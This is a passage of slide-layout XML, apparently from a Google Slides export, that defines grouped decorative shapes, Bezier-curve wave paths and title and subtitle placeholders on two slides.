            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10207125" y="3808369"/>
              <a:ext cx="26632" cy="26632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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9549176" y="3999362"/>
              <a:ext cx="82349" cy="79306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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9196698" y="3144502"/>
              <a:ext cx="29423" cy="29507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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9707787" y="1811104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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9613771" y="3653647"/>
              <a:ext cx="106868" cy="90212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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9387775" y="3309201"/>
              <a:ext cx="79221" cy="70597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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9540468" y="1825815"/>
              <a:ext cx="79306" cy="70851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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9725373" y="1297224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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9834186" y="950579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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9666613" y="965375"/>
              <a:ext cx="79559" cy="70597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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10177702" y="1025488"/>
              <a:ext cx="79475" cy="71612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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9490416" y="2925778"/>
              <a:ext cx="44303" cy="39737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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9352519" y="3023684"/>
              <a:ext cx="43965" cy="4109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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10177702" y="4093379"/>
              <a:ext cx="29507" cy="29423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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10421622" y="4278284"/>
              <a:ext cx="55801" cy="5597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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10177702" y="4003758"/>
              <a:ext cx="44303" cy="39822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4" name="Google Shape;544;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="6321128" y="2391308"/>
            <a:ext cx="1715385" cy="3918270"/>
            <a:chOff x="10706378" y="539509"/>
            <a:chExt cx="1715385" cy="3918270"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="545" name="Google Shape;545;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10962050" y="4005280"/>
              <a:ext cx="61635" cy="6163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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12057532" y="2466178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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12242691" y="3905345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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12313119" y="3942123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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11188130" y="539509"/>
              <a:ext cx="76431" cy="7288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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12028109" y="2213550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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11998771" y="104738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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10706378" y="897737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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12377798" y="1239985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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11390875" y="387017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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11928258" y="4263742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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11658045" y="384666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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11393665" y="4251990"/>
              <a:ext cx="29507" cy="26379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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11655255" y="3757049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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10809357" y="4417957"/>
              <a:ext cx="43965" cy="39822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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11919550" y="227535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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12004605" y="2130778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55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="5632456" y="-1028869"/>
            <a:ext cx="737423" cy="2819743"/>
            <a:chOff x="12445182" y="1003506"/>
            <a:chExt cx="737423" cy="2819743"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="563" name="Google Shape;563;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12486357" y="2971349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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12539199" y="3209181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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12953481" y="2695301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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="13106174" y="2316275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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12882969" y="2054939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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="13147264" y="1943336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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="13097212" y="3250271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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12524657" y="3605793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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12791742" y="358228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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="13035662" y="376719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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12715396" y="3281215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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12665597" y="3228373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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12445182" y="1003506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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12518738" y="114089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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12788952" y="3492753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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="13023910" y="2818064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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="13000405" y="2388309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55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581" name="Google Shape;581;p55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55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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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55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55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5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5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5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5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5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5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5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5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5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5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5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5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5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55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55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5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5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5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5" name="Google Shape;635;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1" y="2590808"/>
            <a:ext cx="3840097" cy="2558635"/>
            <a:chOff x="235225" y="2771600"/>
            <a:chExt cx="3133750" cy="2088000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="636" name="Google Shape;636;p55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55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5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5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5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1" name="Google Shape;641;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="13729" y="0"/>
            <a:ext cx="1398984" cy="543375"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="9850" w="25360">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="710" y="2250"/>
                  <a:pt x="1522" y="3945"/>
                  <a:pt x="3789" y="3945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4182" y="3945"/>
                  <a:pt x="4620" y="3894"/>
                  <a:pt x="5108" y="3786"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5297" y="3744"/>
                  <a:pt x="5474" y="3725"/>
                  <a:pt x="5643" y="3725"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8212" y="3725"/>
                  <a:pt x="8708" y="8194"/>
                  <a:pt x="12434" y="8194"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13207" y="8194"/>
                  <a:pt x="14118" y="8001"/>
                  <a:pt x="15216" y="7537"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16209" y="7117"/>
                  <a:pt x="16981" y="6948"/>
                  <a:pt x="17615" y="6948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20241" y="6948"/>
                  <a:pt x="20510" y="9850"/>
                  <a:pt x="24406" y="9850"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24702" y="9850"/>
                  <a:pt x="25019" y="9833"/>
                  <a:pt x="25360" y="9797"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="25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55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5954700" y="0"/>
            <a:ext cx="3189300" cy="1619850"/>
            <a:chOff x="4185675" y="845125"/>
            <a:chExt cx="3189300" cy="1619850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="643" name="Google Shape;643;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4185675" y="845125"/>
              <a:ext cx="3189300" cy="1619850"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="64794" w="127572">
                  <a:moveTo>
                    <a:pt x="113336" y="23816"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="113349" y="23816"/>
                    <a:pt x="113375" y="23828"/>
                    <a:pt x="113414" y="23864"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113336" y="23864"/>
                    <a:pt x="113311" y="23816"/>
                    <a:pt x="113336" y="23816"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11578" y="3144"/>
                    <a:pt x="24234" y="3902"/>
                    <a:pt x="36229" y="3902"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39143" y="3902"/>
                    <a:pt x="42018" y="3858"/>
                    <a:pt x="44829" y="3791"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47556" y="3735"/>
                    <a:pt x="50348" y="3599"/>
                    <a:pt x="53102" y="3599"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61161" y="3599"/>
                    <a:pt x="68895" y="4764"/>
                    <a:pt x="73715" y="12489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78060" y="19403"/>
                    <a:pt x="81967" y="26433"/>
                    <a:pt x="90772" y="28101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98694" y="29662"/>
                    <a:pt x="106054" y="27325"/>
                    <a:pt x="111184" y="35354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113075" y="38360"/>
                    <a:pt x="113744" y="41822"/>
                    <a:pt x="114413" y="45274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115421" y="50520"/>
                    <a:pt x="117651" y="54864"/>
                    <a:pt x="120997" y="58995"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123004" y="61225"/>
                    <a:pt x="125234" y="63232"/>
                    <a:pt x="127571" y="64793"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="127571" y="52527"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="125787" y="51073"/>
                    <a:pt x="124226" y="49405"/>
                    <a:pt x="122888" y="47505"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120328" y="43606"/>
                    <a:pt x="118650" y="39146"/>
                    <a:pt x="117981" y="34569"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117428" y="30555"/>
                    <a:pt x="117535" y="25871"/>
                    <a:pt x="113414" y="23864"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="113414" y="23864"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="116643" y="25095"/>
                    <a:pt x="117874" y="28324"/>
                    <a:pt x="118650" y="31447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119766" y="35907"/>
                    <a:pt x="120774" y="40484"/>
                    <a:pt x="123111" y="44382"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124342" y="46505"/>
                    <a:pt x="125787" y="48397"/>
                    <a:pt x="127571" y="50074"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="127571" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70816" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72154" y="339"/>
                    <a:pt x="73376" y="669"/>
                    <a:pt x="74714" y="1115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78399" y="2230"/>
                    <a:pt x="82297" y="3568"/>
                    <a:pt x="85420" y="5915"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87766" y="7699"/>
                    <a:pt x="89211" y="10036"/>
                    <a:pt x="90665" y="12489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92226" y="15389"/>
                    <a:pt x="93225" y="19180"/>
                    <a:pt x="96571" y="20634"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100701" y="22419"/>
                    <a:pt x="105608" y="22080"/>
                    <a:pt x="109952" y="22749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110068" y="22749"/>
                    <a:pt x="110068" y="22865"/>
                    <a:pt x="109952" y="22865"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105715" y="22642"/>
                    <a:pt x="101147" y="23195"/>
                    <a:pt x="97017" y="21749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94118" y="20857"/>
                    <a:pt x="92110" y="18734"/>
                    <a:pt x="90549" y="16174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88988" y="13498"/>
                    <a:pt x="87543" y="10482"/>
                    <a:pt x="85312" y="8368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82413" y="5692"/>
                    <a:pt x="78506" y="4237"/>
                    <a:pt x="74714" y="3122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70254" y="1677"/>
                    <a:pt x="65686" y="785"/>
                    <a:pt x="6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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5713400" y="845125"/>
              <a:ext cx="1224000" cy="579875"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="23195" w="48960">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4577" y="785"/>
                    <a:pt x="9145" y="1677"/>
                    <a:pt x="13605" y="3122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17397" y="4237"/>
                    <a:pt x="21304" y="5692"/>
                    <a:pt x="24203" y="8368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26434" y="10482"/>
                    <a:pt x="27879" y="13498"/>
                    <a:pt x="29440" y="16174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31001" y="18734"/>
                    <a:pt x="33009" y="20857"/>
                    <a:pt x="35908" y="21749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40038" y="23195"/>
                    <a:pt x="44606" y="22642"/>
                    <a:pt x="48843" y="22865"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48959" y="22865"/>
                    <a:pt x="48959" y="22749"/>
                    <a:pt x="48843" y="22749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44499" y="22080"/>
                    <a:pt x="39592" y="22419"/>
                    <a:pt x="35462" y="20634"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32116" y="19180"/>
                    <a:pt x="31117" y="15389"/>
                    <a:pt x="29556" y="12489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28102" y="10036"/>
                    <a:pt x="26657" y="7699"/>
                    <a:pt x="24311" y="5915"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21188" y="3568"/>
                    <a:pt x="17290" y="2230"/>
                    <a:pt x="13605" y="1115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12267" y="669"/>
                    <a:pt x="11045" y="339"/>
                    <a:pt x="9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55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7018425" y="1440525"/>
              <a:ext cx="356550" cy="717800"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="28712" w="14262">
                  <a:moveTo>
                    <a:pt x="26" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="0"/>
                    <a:pt x="26" y="48"/>
                    <a:pt x="104" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="12"/>
                    <a:pt x="39" y="0"/>
                    <a:pt x="26" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="104" y="48"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="104" y="48"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4225" y="2055"/>
                    <a:pt x="4118" y="6739"/>
                    <a:pt x="4671" y="10753"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5340" y="15330"/>
                    <a:pt x="7018" y="19790"/>
                    <a:pt x="9578" y="23689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10916" y="25589"/>
                    <a:pt x="12477" y="27257"/>
                    <a:pt x="14261" y="28711"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14261" y="26258"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12477" y="24581"/>
                    <a:pt x="11032" y="22689"/>
                    <a:pt x="9801" y="20566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7464" y="16668"/>
                    <a:pt x="6456" y="12091"/>
                    <a:pt x="5340" y="7631"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4564" y="4508"/>
                    <a:pt x="3333" y="1279"/>
                    <a:pt x="104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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033100" y="1803419"/>
            <a:ext cx="33102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49" name="Google Shape;649;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207550" y="2281594"/>
            <a:ext cx="3135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15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650" name="Google Shape;650;p56"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-13316" y="3126092"/>
            <a:ext cx="3025768" cy="2023352"/>
            <a:chOff x="-13316" y="3126092"/>
            <a:chExt cx="3025768" cy="2023352"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="651" name="Google Shape;651;p56"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="-13316" y="3126092"/>
              <a:ext cx="3025768" cy="2023351"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="16935" w="25325">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="16536"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="16817"/>
                    <a:pt x="1503" y="16935"/>
                    <a:pt x="2110" y="16935"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5299" y="16935"/>
                    <a:pt x="6085" y="13681"/>
                    <a:pt x="8364" y="13681"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8710" y="13681"/>
                    <a:pt x="9091" y="13756"/>
                    <a:pt x="9519" y="13929"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10552" y="14339"/>
                    <a:pt x="11392" y="14518"/>
                    <a:pt x="12083" y="14518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16729" y="14518"/>
                    <a:pt x="14586" y="6431"/>
                    <a:pt x="18874" y="6431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19024" y="6431"/>
                    <a:pt x="19183" y="6441"/>
                    <a:pt x="19349" y="6462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19633" y="6495"/>
                    <a:pt x="19899" y="6510"/>
                    <a:pt x="20148" y="6510"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24889" y="6510"/>
                    <a:pt x="23476" y="824"/>
                    <a:pt x="25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 rot="10800000">
              <a:off x="-13308" y="4132062"/>
              <a:ext cx="2619371" cy="1017382"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="9850" w="25360">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="710" y="2250"/>
                    <a:pt x="1522" y="3945"/>
                    <a:pt x="3789" y="3945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4182" y="3945"/>
                    <a:pt x="4620" y="3894"/>
                    <a:pt x="5108" y="3786"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5297" y="3744"/>
                    <a:pt x="5474" y="3725"/>
                    <a:pt x="5643" y="3725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8212" y="3725"/>
                    <a:pt x="8708" y="8194"/>
                    <a:pt x="12434" y="8194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13207" y="8194"/>
                    <a:pt x="14118" y="8001"/>
                    <a:pt x="15216" y="7537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16209" y="7117"/>
                    <a:pt x="16981" y="6948"/>
                    <a:pt x="17615" y="6948"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20241" y="6948"/>
                    <a:pt x="20510" y="9850"/>
                    <a:pt x="24406" y="9850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24702" y="9850"/>
                    <a:pt x="25019" y="9833"/>
                    <a:pt x="25360" y="9797"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25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p56"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5898126" y="-3"/>
            <a:ext cx="3245882" cy="2349753"/>
            <a:chOff x="5905501" y="2793747"/>
            <a:chExt cx="3245882" cy="2349753"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="654" name="Google Shape;654;p56"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5905501" y="2793747"/>
              <a:ext cx="3245871" cy="2349753"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="19063" w="26333">
                  <a:moveTo>
                    <a:pt x="25412" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22359" y="1"/>
                    <a:pt x="24734" y="5340"/>
                    <a:pt x="22109" y="5340"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21690" y="5340"/>
                    <a:pt x="21144" y="5204"/>
                    <a:pt x="20427" y="4888"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20150" y="4767"/>
                    <a:pt x="19905" y="4714"/>
                    <a:pt x="19685" y="4714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17927" y="4714"/>
                    <a:pt x="17797" y="8159"/>
                    <a:pt x="15642" y="8159"/>
